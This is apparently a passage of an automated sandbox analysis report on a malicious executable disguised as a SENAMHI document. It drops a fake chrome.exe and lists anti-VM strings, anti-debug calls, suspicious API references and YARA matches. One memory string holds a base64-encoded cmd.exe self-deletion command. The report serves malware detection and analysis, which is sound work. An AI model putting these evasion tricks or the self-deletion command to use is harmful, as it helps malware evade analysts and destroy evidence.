                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeThread delayed: delay time: 922337203685477
                      Source: wtqsCpda..exe, 0000000F.00000002.80316092456.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\Windows\vboxhook.dll
                      Source: chrome.exe, 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: vmware
                      Source: chrome.exeBinary or memory string: \vboxhook.dll
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.79810306933.000000000117A000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000003.79799132484.000000000117E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllO
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684948349.00000000011ED000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83501450597.0000000001151000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502605752.00000000011ED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: wtqsCpda..exe, 0000000F.00000000.79892756744.0000000000542000.00000002.00000001.01000000.00000007.sdmp, wtqsCpda..exe, 0000000F.00000002.80316124713.0000000002B22000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000012.00000000.80097480691.0000000000762000.00000002.00000001.01000000.00000009.sdmp, chrome.exe, 00000013.00000000.80248070314.0000000000A22000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: \vboxhook.dllQY21kLmV4ZSAvYyBwaW5nIDAgLW4gMiAmIGRlbCA=
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BD71A3 VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,1_2_00BD71A3
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BDA22B FindFirstFileExW,1_2_00BDA22B
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BD7B8E mov eax, dword ptr fs:[00000030h]1_2_00BD7B8E
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BD9DF6 mov eax, dword ptr fs:[00000030h]1_2_00BD9DF6
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 12_2_02E6001A mov eax, dword ptr fs:[00000030h]12_2_02E6001A
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BD4959 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BD4959
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BD71A3 VirtualProtect ?,-00000001,00000104,?,?,?,0000001C1_2_00BD71A3
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BDB2B8 GetProcessHeap,1_2_00BDB2B8
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeCode function: 18_2_02B9A698 LdrInitializeThunk,18_2_02B9A698
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BD4959 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BD4959
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BD4AEF SetUnhandledExceptionFilter,1_2_00BD4AEF
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BD72E0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00BD72E0
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BD42DA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00BD42DA

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: Chrome[1].exe.1.dr, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: wtqsCpda..exe.1.dr, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: chrome.exe.15.dr, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: 15.0.wtqsCpda..exe.540000.3.unpack, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: 15.0.wtqsCpda..exe.540000.2.unpack, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: 15.0.wtqsCpda..exe.540000.1.unpack, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: 15.0.wtqsCpda..exe.540000.0.unpack, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: 15.2.wtqsCpda..exe.540000.0.unpack, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: IconLib.dll.18.dr, System.Drawing.IconLib/Win32.csReference to suspicious API methods: ('FindResource', 'FindResource@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll'), ('LoadLibraryEx', 'LoadLibraryEx@kernel32.dll')
                      Source: 18.2.chrome.exe.760000.0.unpack, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: 18.0.chrome.exe.760000.0.unpack, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.chrome.exe.a20000.0.unpack, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: 19.2.chrome.exe.a20000.0.unpack, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.chrome.exe.a20000.1.unpack, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.chrome.exe.a20000.2.unpack, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: 19.0.chrome.exe.a20000.3.unpack, ??????????????/???????.csReference to suspicious API methods: ('?????????', 'LoadLibrary@kernel32.dll')
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeProcess created: C:\Users\user\AppData\Local\Temp\chrome.exe "C:\Users\user\AppData\Local\Temp\chrome.exe"
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: GetProgmanWindow
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager+
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager-
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000003.80684835019.00000000011DA000.00000004.00000020.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83502455517.00000000011DA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager5
                      Source: DocumentoSENAMHI20222103.exe, 00000001.00000002.83509823788.000000000515F000.00000004.00000800.00020000.00000000.sdmp, DocumentoSENAMHI20222103.exe, 00000001.00000002.83511925092.0000000005570000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeQueries volume information: C:\Users\user\AppData\Roaming\wtqsCpda..exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrome.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeQueries volume information: C:\Users\user\AppData\Local\Temp\chrome.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\chrome.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BD4775 cpuid 1_2_00BD4775
                      Source: C:\Users\user\AppData\Roaming\wtqsCpda..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\DocumentoSENAMHI20222103.exeCode function: 1_2_00BD4BDE GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_00BD4BDE

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.chrome.exe.760000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.0.chrome.exe.760000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.wtqsCpda..exe.2b22c9c.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.0.wtqsCpda..exe.540000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.2.chrome.exe.a20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 19.0.chrome.exe.a20000.1.unpack, type: UNPACKEDPE
